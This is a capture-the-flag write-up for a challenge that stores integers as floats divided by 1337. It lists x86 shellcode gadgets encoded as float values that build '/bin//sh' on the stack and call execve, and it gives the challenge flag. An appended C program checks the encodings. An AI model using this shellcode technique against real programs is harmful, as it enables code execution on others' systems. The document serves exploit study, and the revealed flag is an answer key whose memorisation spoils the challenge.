fixedpoint_ae55a0eef8e55c22fe0b9ba2affeff67.c
0/1337.0 = 0x3a44119e and 0xffffffff/1337.0 = 0x4a44119e, so we can only use gadgets whose float encoding falls within that range. All I had to do was replace push 0x68732f6e and push 0x69622f2f (5-byte instructions) with mov al,<char>; dec esp; mov BYTE PTR [esp],al for each character.
The listing below is formatted as gadget, then Integer:Floating Point. 45 is inc ebp and 46 is inc esi; both serve as NOPs in the shellcode.
31 d2 xor edx,edx
89389b:45d23190
52 push edx
44bb50:45529090
b0 68 mov al,0x68
4bf422:4568b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 73 mov al,0x73
4f8b52:4573b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 6e mov al,0x6e
4de982:456eb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 69 mov al,0x69
4c47b2:4569b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 62 mov al,0x62
49fec2:4562b090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
b0 2f mov al,0x2f
395912:452fb090
4c dec esp
42c5f0:454c9090
88 04 24 mov BYTE PTR [esp],al
d626ea:46240488
89 e3 mov ebx,esp
948b2e:45e38990
52 push edx
44bb50:45529090
53 push ebx
450ee0:45539090
89 e1 mov ecx,esp
933cee:45e18990
8d 42 0b lea eax,[edx+0xb]
2d74e9:450b428d
cd 80 int 0x80
15058ca:4680cd90
FLAG: PCTF{why_isnt_IEEE_754_IEEE_7.54e2}
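
As an added check (not part of the original write-up or the challenge source), the C program below recomputes the float bit pattern for every distinct Integer:Floating Point pair in the listing and prints the bytes in little-endian memory order. It assumes the challenge stores ((float)n)/1337.0 as a 32-bit float; the names stored_bits, memory_bytes, pairs, count_mismatches and count_bad_filler are chosen here for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Assumption: the challenge stores ((float)n) / 1337.0 as a 32-bit float. */
uint32_t stored_bits(int32_t n) {
    float f = (float)((float)n / 1337.0);
    uint32_t bits;
    memcpy(&bits, &f, sizeof bits);
    return bits;
}

/* The four bytes as they sit in little-endian x86 memory, lowest address first. */
void memory_bytes(uint32_t bits, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) out[i] = (unsigned char)(bits >> (8 * i));
}

/* Distinct Integer:Floating Point pairs copied from the listing on this page. */
static const struct { int32_t n; uint32_t bits; } pairs[] = {
    {0x89389b, 0x45d23190}, {0x44bb50, 0x45529090}, {0x4bf422, 0x4568b090},
    {0x42c5f0, 0x454c9090}, {0xd626ea, 0x46240488}, {0x4f8b52, 0x4573b090},
    {0x395912, 0x452fb090}, {0x4de982, 0x456eb090}, {0x4c47b2, 0x4569b090},
    {0x49fec2, 0x4562b090}, {0x948b2e, 0x45e38990}, {0x450ee0, 0x45539090},
    {0x933cee, 0x45e18990}, {0x2d74e9, 0x450b428d}, {0x15058ca, 0x4680cd90},
};
enum { NPAIRS = sizeof pairs / sizeof pairs[0] };

/* Number of listed integers that do not produce the listed bit pattern. */
int count_mismatches(void) {
    int bad = 0;
    for (int i = 0; i < NPAIRS; i++)
        bad += (stored_bits(pairs[i].n) != pairs[i].bits);
    return bad;
}

/* Number of listed words whose highest byte is neither 0x45 nor 0x46. */
int count_bad_filler(void) {
    int bad = 0;
    for (int i = 0; i < NPAIRS; i++)
        bad += ((pairs[i].bits >> 24) != 0x45 && (pairs[i].bits >> 24) != 0x46);
    return bad;
}

int main(void) {
    unsigned char b[4];
    for (int i = 0; i < NPAIRS; i++) {
        memory_bytes(stored_bits(pairs[i].n), b);
        printf("%7x -> %02x %02x %02x %02x\n", (unsigned)pairs[i].n, b[0], b[1], b[2], b[3]);
    }
    return count_mismatches() != 0;  /* non-zero exit status if any pair disagrees */
}
```

Because the float is stored little-endian, the 0x45/0x46 byte that leads each printed word is the last byte executed from that word.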